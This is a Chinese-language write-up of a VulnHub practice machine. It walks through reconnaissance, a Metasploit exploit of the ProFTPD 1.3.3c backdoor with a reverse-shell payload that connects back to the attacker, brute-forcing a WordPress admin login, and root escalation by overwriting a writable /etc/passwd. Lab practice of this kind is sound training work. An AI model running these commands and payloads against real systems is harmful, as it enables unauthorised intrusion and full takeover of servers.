vulnhub靶场实战-Basic Pentesting:1 信息收集ip端口目录使用netdiscover -r 192.168.235.0/24获取 ip192.168.235.130扫描端口nmap -sV -p- 192.168.235.130目录扫描dirb http://192.168.235.130/收集到的信息ip192.168.235.130端口PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:0C:29:35:37:A3 (VMware)方式一从端口信息看到有一个 ftp 的软件搜索一下是否有可用内容发现有两个可用。看一下这两个文件先searchsploit -p 16921看一下完整路径然后访问一下cat /usr/share/exploitdb/exploits/linux/remote/16921.rb看到开头说 metasploit那就进去看一下。msfconsole 启动并search ProFTPD 1.3.3c搜索一下看到有一个可用use 0使用show options看一下需要设置哪些信息set rhost 192.168.235.130设置一下目标 ip也就是靶场 ipset payload cmd/unix/reverse设置一下 payload。设置这个命令后如果利用该漏洞ProFTPD 1.3.3c 后门攻击成功目标 Linux 服务器就会主动反向连接回到你的攻击机从而让你获得一个目标服务器的命令行控制权限Shell。set lhost 192.168.235.128设置一下攻击者 ip也就是 kali linux 的 ip直接run -j发现有 session 1。进入后id一下是 root方式二从开始得到 ip 和端口开始直接访问一下 192.168.235.130网页是这个样子在目录扫描中依次打开发现有两个网页一个前台一个后台可以看出是使用 wordpress 搭建的博客系统wordpress 搭建的 admin 系统有默认的一些密码。使用弱口令爆破一下或者添加字典文件使用 bp 的 intruder 模块的单参数爆破密码。最终获取到密码也为 admin登录进去登陆 msfconsole 后执行search wordpress type:exploit -s date查看是否有可以利用的漏洞可以看到大都是利用 wp_xxx 的格式也就是 wp 的漏洞根据不同的模块进行划分这里使用 43use 43并show options看一下需要设置哪些set rhosts 192.168.235.130看到还需设置一个 targeturi因为访问的网站并不直接是根目录中间还有个 secret所以需要加上set targeturi /secret设置用户名set username admin设置密码set password admin然后便可直接run -j以及进入sessions 1shell 进入后发现不是 root虽然进去后台了但是还是需要提权。passwd 文件中保存的是用户名密码以及可执行的 bin。查看ls -la /etc/passwd发现 passwd 文件是可以编辑的cat /etc/passwd看到里面的内容是开头后面都跟个 x比如root:x:...x 意味着密码是记录在 /etc/shadow 中的ls -la /etc/shadow但是查看发现 shadow 文件只可读无法编辑。还是使用vi /etc/passwd对 passwd 进行编辑但是进去后不好操作。在修改密码前需要先生成一个密码密码就是 adminopenssl passwd -1 admin会生成一个 md5 格式的密码哈希退出下载靶机的 /etc/passwd 文件到本地download /etc/passwd ./passwd编辑本地 passwd 文件在开头 root 处把 x 修改为前面生成的一长串哈希密码然后将修改后的 passwd 文件上传回靶机upload ./passwd /etc/passwd最后便可切换到 root 用户shell python -c import pty; pty.spawn(/bin/bash) su root输入密码 admin成功结束另外在最后一步中meterpreter edit /etc/passwd使用 edit 时出现的是空文件然后回去 shell 后啥也运行不了了虚拟机重启也一直紫屏。esc 查看显示最后一行内容。只能把虚拟机删除重新导入才恢复网上也没搜到出现过相关问题deepseek 给的答案只说使用 edit 打开 passwd 文件时自动将远程靶机的 passwd 文件也修改为空了。跪求大佬看看问题在哪